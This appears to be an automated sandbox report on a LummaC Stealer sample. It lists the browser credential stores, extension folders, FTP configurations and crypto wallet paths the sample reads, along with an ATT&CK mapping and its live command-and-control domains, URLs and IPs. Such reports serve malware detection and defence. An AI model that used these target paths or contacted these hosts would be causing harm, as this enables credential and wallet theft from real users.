Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: lummm_lzmb.exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Disable or Modify Tools	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	231 Virtualization/Sandbox Evasion	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	31 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	231 Virtualization/Sandbox Evasion	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lummm_lzmb.exe	17%	Virustotal		Browse
lummm_lzmb.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://klipgonuh.shop/	0%	Avira URL Cloud	safe
https://burnressert.shop/apibu	0%	Avira URL Cloud	safe
https://cegu.shop/8574262446/ph.txt4l	100%	Avira URL Cloud	malware
https://burnressert.shop/api	100%	Avira URL Cloud	malware
https://u1.grapplereturnunstamped.shop/iqqhm.dat	0%	Avira URL Cloud	safe
burnressert.shop	0%	Avira URL Cloud	safe
https://cegu.shop/8574262446/ph.txtnbF3	100%	Avira URL Cloud	malware
https://u1.grapplereturnunstamped.shop	0%	Avira URL Cloud	safe
https://klipgonuh.shop:443/int_clp_sha.txtstem32C:10.0.19045C:	0%	Avira URL Cloud	safe
https://klipgonuh.shop/int_clp_sha.txt0	0%	Avira URL Cloud	safe
https://burnressert.shop/D1Q	0%	Avira URL Cloud	safe
https://klipgonuh.shop/int_clp_sha.txtv	0%	Avira URL Cloud	safe
https://dfgh.online/invoker.php?compName=hZ	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
burnressert.shop	104.21.67.165	true	false	high
u1.grapplereturnunstamped.shop	104.21.78.33	true	false	high
klipgonuh.shop	104.21.15.122	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
kickykiduz.lat	false		high
https://u1.grapplereturnunstamped.shop/iqqhm.dat	false	Avira URL Cloud: safe	unknown
bloodyswif.lat	false		high
savorraiykj.lat	false		high
miniatureyu.lat	false		high
https://burnressert.shop/api	true	Avira URL Cloud: malware	unknown
washyceehsu.lat	false		high
https://cegu.shop/8574262446/ph.txt	false		high
finickypwk.lat	false		high
burnressert.shop	true	Avira URL Cloud: safe	unknown
shoefeatthe.lat	false		high
leggelatez.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://stackoverflow.com/q/14436606/23354	lummm_lzmb.exe, 00000000.00000002.1714027294.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	false		high
https://klipgonuh.shop/	lummm_lzmb.exe, 00000001.00000002.1954001476.0000000000C18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compName=	powershell.exe, 00000005.00000002.1953315798.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1953180738.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1954311872.0000000000C90000.00000004.00000020.00020000.00000000.sdmp	false		high
https://burnressert.shop/apibu	lummm_lzmb.exe, 00000001.00000002.1954673300.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000005.00000002.1955462993.0000000004B27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1955462993.0000000004B18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop/8574262446/ph.txt4l	lummm_lzmb.exe, 00000001.00000002.1954539384.0000000000C68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cegu.shop/8574262446/ph.txtnbF3	lummm_lzmb.exe, 00000001.00000002.1954673300.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stackoverflow.com/q/11564914/23354;	lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	false		high
https://u1.grapplereturnunstamped.shop	lummm_lzmb.exe, 00000000.00000002.1714027294.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://klipgonuh.shop:443/int_clp_sha.txtstem32C:10.0.19045C:	lummm_lzmb.exe, 00000001.00000002.1954001476.0000000000C18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://klipgonuh.shop/int_clp_sha.txt	lummm_lzmb.exe, 00000001.00000002.1954001476.0000000000C18000.00000004.00000020.00020000.00000000.sdmp	false		high
https://klipgonuh.shop/int_clp_sha.txt0	lummm_lzmb.exe, 00000001.00000002.1954539384.0000000000C68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://klipgonuh.shop/int_clp_sha.txtv	lummm_lzmb.exe, 00000001.00000002.1954539384.0000000000C68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	lummm_lzmb.exe, 00000000.00000002.1714027294.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1955462993.0000000004B44000.00000004.00000800.00020000.00000000.sdmp	false		high
https://burnressert.shop/D1Q	lummm_lzmb.exe, 00000001.00000002.1954673300.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dfgh.online/invoker.php?compName=hZ	powershell.exe, 00000005.00000002.1955462993.0000000004DD7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.15.122	klipgonuh.shop	United States	13335	CLOUDFLARENETUS	false
104.21.78.33	u1.grapplereturnunstamped.shop	United States	13335	CLOUDFLARENETUS	false
185.161.251.21	cegu.shop	United Kingdom	5089	NTLGB	false
104.21.67.165	burnressert.shop	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592036
Start date and time:	2025-01-15 17:24:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lummm_lzmb.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/3@4/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 89% Number of executed functions: 180 Number of non-executed functions: 44
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2004 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:24:58	API Interceptor	27x Sleep call for process: lummm_lzmb.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.15.122	ActiVe_Ver_Set-UpFilE.exe	Get hash	malicious	LummaC Stealer	Browse
104.21.15.122	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
104.21.78.33	https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082	Get hash	malicious	Unknown	Browse
